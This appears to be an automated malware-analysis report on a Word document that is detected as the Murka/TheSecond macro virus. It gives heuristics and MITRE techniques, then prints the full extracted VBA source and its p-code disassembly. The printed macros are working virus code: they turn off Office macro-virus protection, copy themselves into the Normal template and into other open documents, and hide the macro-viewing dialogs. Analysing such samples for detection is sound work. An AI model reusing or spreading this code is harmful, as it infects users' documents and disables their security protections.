Verdict: MALICIOUS (Risk Score: 188)

Malware Insights

MITRE ATT&CK:
- T1566.001 Spearphishing Attachment
- T1059.005 Visual Basic
- T1553.005 Mark-of-the-Web Bypass
The sample contains VBA macros that attempt to disable macro security protections and replicate themselves, as indicated by the 'OLE_VBA_MACRO_VIRUS_REPLICATION' heuristic. The embedded VBA code, identified as 'Murka', explicitly mentions anti-virus evasion and self-replication. The ClamAV detection 'Doc.Trojan.Murka-1' further supports the classification of this file as a malicious document.
Heuristics (5)

- ClamAV: Doc.Trojan.Murka-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Murka-1
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION): VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature. Matched line in script: `.DeleteLines i, j`
- Auto_Close macro (low, OLE_VBA_AUTOCLOSE): Auto_Close macro. Matched line in script: `Sub AutoClose()`
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS): OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16387 bytes | 08a6e1817b5f1cb5f8b8875737f1663e957f75b23e73a3cfecbf9cd9f2ead516 |

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
'*************************************************************************
'Murka - This is the smallest of all known macro-antivirus modules!
'How it works: it loads together with the document and blocks
' the spread of infected modules
'
'Distribution terms: Freeware (free)
'Advantages: correct operation, reliability!
'Disadvantages: none found so far
'
'"All this is fine, of course, but I have no damn idea how
' to get hold of it?!" you will say angrily. You can!
'Grandpa MustDie will tell you everything!
'You only need to open the document on a personal
'computer where the Murka antivirus module is already installed.
'
'To the author: mustdie@chat.ru
'To Murka: murka@chat.ru
'To Danilov: antivir@dials.ru
'*************************************************************************
On Error Resume Next
Dim s As Boolean
Dim i As Long
Dim j As Long
Dim Murka As String
Dim Other As String
Dim str As String
s = ActiveDocument.Saved
Application.EnableCancelKey = wdCancelDisabled
With Options: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
str = "Document_Close"
With MacroContainer.VBProject.VBComponents.Item(1).CodeModule
i = .ProcBodyLine(str, vbext_pk_Proc)
j = .ProcCountLines(str, vbext_pk_Proc)
Murka = .Lines(i, j)
End With
With NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
i = .ProcBodyLine(str, vbext_pk_Proc)
j = .ProcCountLines(str, vbext_pk_Proc)
Other = .Lines(i, j)
If Other <> Murka And Murka <> "" Then
.DeleteLines i, j
.InsertLines 1, Murka
NormalTemplate.Save
End If
End With
With ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
i = .ProcBodyLine(str, vbext_pk_Proc)
j = .ProcCountLines(str, vbext_pk_Proc)
Other = .Lines(i, j)
If Other <> Murka And Murka <> "" Then
.DeleteLines i, j
.InsertLines 1, Murka
Randomize
If Rnd < 0.3 Then With Dialogs(wdDialogFileSummaryInfo): .Title = "Murka3": .Author = "M&M": .Execute: End With
If Left(ActiveDocument.Name, 8) = "Document" Or Left(ActiveDocument.Name, 8) = "Документ" Then
Else
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
End If
End With
If ActiveDocument.Saved <> s Then ActiveDocument.Saved = s
End Sub
Attribute VB_Name = "TheSecond"
Sub AutoClose()
Copyrights = "The Second, 2000"
NickName = "Revenger"
Options.VirusProtection = False
flag = False
If Documents.Count >= 1 Then
counter = NormalTemplate.VBProject.VBComponents.Count
For i = 1 To counter
If NormalTemplate.VBProject.VBComponents.Item(i).Name = "TheSecond" Then flag = True
Next i
x = Application.StartupPath + "\TheSecond.tmp"
If Not flag Then
ActiveDocument.VBProject.VBComponents("TheSecond").Export (x)
NormalTemplate.VBProject.VBComponents.Import (x)
End If
flag = False
infected = False
havesave = ActiveDocument.Saved
For i = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents.Item(i).Name = "TheSecond" Then flag = True
Next i
If Not flag Then
NormalTemplate.VBProject.VBComponents("TheSecond").Export (x)
ActiveDocument.VBProject.VBComponents.Import (x)
infected = True
End If
If havesave And infected And (Left(ActiveDocument.Name, 8) <> "Документ") Then
Dialogs(wdDialogFileSaveAs).Execute
End If
ActiveDocument.Saved = havesave
End If
End Sub
Sub FilePrint()
Selection.Find.ClearFormatting
Selection.Find.Replacement.ClearFormatting
With Selection.Find
.Text = "Нюбин"
.Replacement.Text = "Нудин"
.Forward = True
.Wrap = wdFindContinue
.Format = False
.MatchCase = False
.MatchWholeWord = False
.MatchWildcards = False
End With
Selection.Find.Execute Replace:=wdReplaceAll
Dialogs(wdDialogFilePrint).Show
Selection.Find.ClearFormatting
Selection.Find.Replacement.ClearFormatting
With Selection.Find
.Text = "Нудин"
.Replacement.Text = "Нюбин"
.Forward = True
.Wrap = wdFindContinue
.Format = False
.MatchCase = False
.MatchWholeWord = False
.MatchWildcards = False
End With
Selection.Find.Execute Replace:=wdReplaceAll
End Sub
Sub toolsmacro()
Dialogs(wdDialogToolsMacro).Display
End Sub
Sub ViewVBCode()
MsgBox ("Нет загруженных макросов!")
End Sub
' Processing file: /tmp/qstore_js8njdiw
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 9631 bytes
' Line #0:
' FuncDefn (Private Sub Document_Close())
' Line #1:
' QuoteRem 0x0000 0x0049 "*************************************************************************"
' Line #2:
' QuoteRem 0x0000 0x0048 "Murka - Это самый маленький из всех известных МакроАнтивирусных модулей!"
' Line #3:
' QuoteRem 0x0000 0x003D "Принцип действия: Загружается вместе с документом и блокирует"
' Line #4:
' QuoteRem 0x0000 0x0033 " распространение зараженных модулей"
' Line #5:
' QuoteRem 0x0000 0x0000 ""
' Line #6:
' QuoteRem 0x0000 0x002B "Условия распространения: Freeware(Свободно)"
' Line #7:
' QuoteRem 0x0000 0x0037 "Достоинства: Корректная работа, надежность!"
' Line #8:
' QuoteRem 0x0000 0x0026 "Недостатки: Пока не нашел"
' Line #9:
' QuoteRem 0x0000 0x0000 ""
' Line #10:
' QuoteRem 0x0000 0x003A ""Все это, конечно, хорошо, но я ни хрена не понял, как его"
' Line #11:
' QuoteRem 0x0000 0x0030 " можно преобрести?!" - гневно скажешь ты. Можно!"
' Line #12:
' QuoteRem 0x0000 0x001D "Дед MustDie вам все раскажет!"
' Line #13:
' QuoteRem 0x0000 0x0030 "Необходимо лишь открыть документ на персональном"
' Line #14:
' QuoteRem 0x0000 0x0034 "компе. где уже установлен антивирусный модуль Murka."
' Line #15:
' QuoteRem 0x0000 0x0000 ""
' Line #16:
' QuoteRem 0x0000 0x0019 "Автору: mustdie@chat.ru"
' Line #17:
' QuoteRem 0x0000 0x0017 "Murke: murka@chat.ru"
' Line #18:
' QuoteRem 0x0000 0x001A "Данилову: antivir@dials.ru"
' Line #19:
' QuoteRem 0x0000 0x0049 "*************************************************************************"
' Line #20:
' OnError (Resume Next)
' Line #21:
' Dim
' VarDefn s (As Boolean)
' Line #22:
' Dim
' VarDefn i (As Long)
' Line #23:
' Dim
' VarDefn j (As Long)
' Line #24:
' Dim
' VarDefn Murka (As String)
' Line #25:
' Dim
' VarDefn Other (As String)
' Line #26:
' Dim
' VarDefn str (As String)
' Line #27:
' Ld ActiveDocument
' MemLd Saved
' St s
' Line #28:
' Ld wdCancelDisabled
' Ld Application
' MemSt EnableCancelKey
' Line #29:
' StartWithExpr
' Ld Options
' With
' BoS 0x0000
' LitDI2 0x0000
' MemStWith VirusProtection
' BoS 0x0000
' LitDI2 0x0000
' MemStWith SaveNormalPrompt
' BoS 0x0000
' EndWith
' Line #30:
' LitStr 0x000E "Document_Close"
' St str
' Line #31:
' StartWithExpr
' LitDI2 0x0001
' Ld MacroContainer
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' With
' Line #32:
' Ld str
' Ld vbext_pk_Proc
' ArgsMemLdWith ProcBodyLine 0x0002
' St i
' Line #33:
' Ld str
' Ld vbext_pk_Proc
' ArgsMemLdWith ProcCountLines 0x0002
' St j
' Line #34:
' Ld i
' Ld j
' ArgsMemLdWith Lines 0x0002
' St Murka
' Line #35:
' EndWith
' Line #36:
' StartWithExpr
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' With
' Line #37:
' Ld str
' Ld vbext_pk_Proc
' ArgsMemLdWith ProcBodyLine 0x0002
' St i
' Line #38:
' Ld str
' Ld vbext_pk_Proc
' ArgsMemLdWith ProcCountLines 0x0002
' St j
' Line #39:
' Ld i
' Ld j
' ArgsMemLdWith Lines 0x0002
' St Other
' Line #40:
' Ld Other
' Ld Murka
' Ne
' Ld Murka
' LitStr 0x0000 ""
' Ne
' And
' IfBlock
' Line #41:
' Ld i
' Ld j
' ArgsMemCallWith DeleteLines 0x0002
' Line #42:
' LitDI2 0x0001
' Ld Murka
' ArgsMemCallWith InsertLines 0x0002
' Line #43:
' Ld NormalTemplate
' ArgsMemCall Save 0x0000
' Line #44:
' EndIfBlock
' Line #45:
' EndWith
' Line #46:
' StartWithExpr
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' With
' Line #47:
' Ld str
' Ld vbext_pk_Proc
' ArgsMemLdWith ProcBodyLine 0x0002
' St i
' Line #48:
' Ld str
' Ld vbext_pk_Proc
' ArgsMemLdWith ProcCountLines 0x0002
' St j
' Line #49:
' Ld i
' Ld j
' ArgsMemLdWith Lines 0x0002
' St Other
' Line #50:
' Ld Other
' Ld Murka
' Ne
' Ld Murka
' LitStr 0x0000 ""
' Ne
' And
' IfBlock
' Line #51:
' Ld i
' Ld j
' ArgsMemCallWith DeleteLines 0x0002
' Line #52:
' LitDI2 0x0001
' Ld Murka
' ArgsMemCallWith InsertLines 0x0002
' Line #53:
' ArgsCall Read 0x0000
' Line #54:
' Ld Rnd
' LitR8 0x3333 0x3333 0x3333 0x3FD3
' Lt
' If
' BoSImplicit
' StartWithExpr
' Ld wdDialogFileSummaryInfo
' ArgsLd Dialogs 0x0001
' With
' BoS 0x0000
' LitStr 0x0006 "Murka3"
' MemStWith Title
' BoS 0x0000
' LitStr 0x0003 "M&M"
' MemStWith Author
' BoS 0x0000
' ArgsMemCallWith Execute 0x0000
' BoS 0x0000
' EndWith
' EndIf
' Line #55:
' Ld ActiveDocument
' MemLd New
' LitDI2 0x0008
' ArgsLd LBound 0x0002
' LitStr 0x0008 "Document"
' Eq
' Ld ActiveDocument
' MemLd New
' LitDI2 0x0008
' ArgsLd LBound 0x0002
' LitStr 0x0008 "Документ"
' Eq
' Or
' IfBlock
' Line #56:
' ElseBlock
' Line #57:
' Ld ActiveDocument
' MemLd FullName
' ParamNamed FileName
' Ld ActiveDocument
' ArgsMemCall SaveAs 0x0001
' Line #58:
' EndIfBlock
' Line #59:
' EndIfBlock
' Line #60:
' EndWith
' Line #61:
' Ld ActiveDocument
' MemLd Saved
' Ld s
' Ne
' If
' BoSImplicit
' Ld s
' Ld ActiveDocument
' MemSt Saved
' EndIf
' Line #62:
' EndSub
' Macros/VBA/TheSecond - 3728 bytes
' Line #0:
' FuncDefn (Sub AutoClose())
' Line #1:
' LitStr 0x0010 "The Second, 2000"
' St Copyrights
' Line #2:
' LitStr 0x0008 "Revenger"
' St NickName
' Line #3:
' LitVarSpecial (False)
' Ld Options
' MemSt VirusProtection
' Line #4:
' LitVarSpecial (False)
' St flag
' Line #5:
' Ld Documents
' MemLd Count
' LitDI2 0x0001
' Ge
' IfBlock
' Line #6:
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' MemLd Count
' St counter
' Line #7:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' Ld counter
' For
' Line #8:
' Ld i
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd New
' LitStr 0x0009 "TheSecond"
' Eq
' If
' BoSImplicit
' LitVarSpecial (True)
' St flag
' EndIf
' Line #9:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #10:
' Ld Application
' MemLd StartupPath
' LitStr 0x000E "\TheSecond.tmp"
' Add
' St x
' Line #11:
' Ld flag
' Not
' IfBlock
' Line #12:
' Ld x
' Paren
' LitStr 0x0009 "TheSecond"
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' ArgsMemCall Export 0x0001
' Line #13:
' Ld x
' Paren
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemCall Import 0x0001
' Line #14:
' EndIfBlock
' Line #15:
' LitVarSpecial (False)
' St flag
' Line #16:
' LitVarSpecial (False)
' St infected
' Line #17:
' Ld ActiveDocument
' MemLd Saved
' St havesave
' Line #18:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' MemLd Count
' For
' Line #19:
' Ld i
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd New
' LitStr 0x0009 "TheSecond"
' Eq
' If
' BoSImplicit
' LitVarSpecial (True)
' St flag
' EndIf
' Line #20:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #21:
' Ld flag
' Not
' IfBlock
' Line #22:
' Ld x
' Paren
' LitStr 0x0009 "TheSecond"
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' ArgsMemCall Export 0x0001
' Line #23:
' Ld x
' Paren
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemCall Import 0x0001
' Line #24:
' LitVarSpecial (True)
' St infected
' Line #25:
' EndIfBlock
' Line #26:
' Ld havesave
' Ld infected
' And
' Ld ActiveDocument
' MemLd New
' LitDI2 0x0008
' ArgsLd LBound 0x0002
' LitStr 0x0008 "Документ"
' Ne
' Paren
' And
' IfBlock
' Line #27:
' Ld wdDialogFileSaveAs
' ArgsLd Dialogs 0x0001
' ArgsMemCall Execute 0x0000
' Line #28:
' EndIfBlock
' Line #29:
' Ld havesave
' Ld ActiveDocument
' MemSt Saved
' Line #30:
' EndIfBlock
' Line #31:
' EndSub
' Line #32:
' FuncDefn (Sub FilePrint())
' Line #33:
' Ld Selection
' MemLd Find
' ArgsMemCall ClearFormatting 0x0000
' Line #34:
' Ld Selection
' MemLd Find
' MemLd Replacement
' ArgsMemCall ClearFormatting 0x0000
' Line #35:
' StartWithExpr
' Ld Selection
' MemLd Find
' With
' Line #36:
' LitStr 0x0005 "Нюбин"
' MemStWith Then
' Line #37:
' LitStr 0x0005 "Нудин"
' MemLdWith Replacement
' MemSt Then
' Line #38:
' LitVarSpecial (True)
' MemStWith Forward
' Line #39:
' Ld wdFindContinue
' MemStWith Wrap
' Line #40:
' LitVarSpecial (False)
' MemStWith Format$
' Line #41:
' LitVarSpecial (False)
' MemStWith MatchCase
' Line #42:
' LitVarSpecial (False)
' MemStWith MatchWholeWord
' Line #43:
' LitVarSpecial (False)
' MemStWith MatchWildcards
' Line #44:
' EndWith
' Line #45:
' Ld wdReplaceAll
' ParamNamed Replace
' Ld Selection
' MemLd Find
' ArgsMemCall Execute 0x0001
' Line #46:
' Ld wdDialogFilePrint
' ArgsLd Dialogs 0x0001
' ArgsMemCall Show 0x0000
' Line #47:
' Ld Selection
' MemLd Find
' ArgsMemCall ClearFormatting 0x0000
' Line #48:
' Ld Selection
' MemLd Find
' MemLd Replacement
' ArgsMemCall ClearFormatting 0x0000
' Line #49:
' StartWithExpr
' Ld Selection
' MemLd Find
' With
' Line #50:
' LitStr 0x0005 "Нудин"
' MemStWith Then
' Line #51:
' LitStr 0x0005 "Нюбин"
' MemLdWith Replacement
' MemSt Then
' Line #52:
' LitVarSpecial (True)
' MemStWith Forward
' Line #53:
' Ld wdFindContinue
' MemStWith Wrap
' Line #54:
' LitVarSpecial (False)
' MemStWith Format$
' Line #55:
' LitVarSpecial (False)
' MemStWith MatchCase
' Line #56:
' LitVarSpecial (False)
' MemStWith MatchWholeWord
' Line #57:
' LitVarSpecial (False)
' MemStWith MatchWildcards
' Line #58:
' EndWith
' Line #59:
' Ld wdReplaceAll
' ParamNamed Replace
' Ld Selection
' MemLd Find
' ArgsMemCall Execute 0x0001
' Line #60:
' EndSub
' Line #61:
' FuncDefn (Sub toolsmacro())
' Line #62:
' Ld wdDialogToolsMacro
' ArgsLd Dialogs 0x0001
' ArgsMemCall Display 0x0000
' Line #63:
' EndSub
' Line #64:
' FuncDefn (Sub ViewVBCode())
' Line #65:
' LitStr 0x0019 "Нет загруженных макросов!"
' Paren
' ArgsCall MsgBox 0x0001
' Line #66:
' EndSub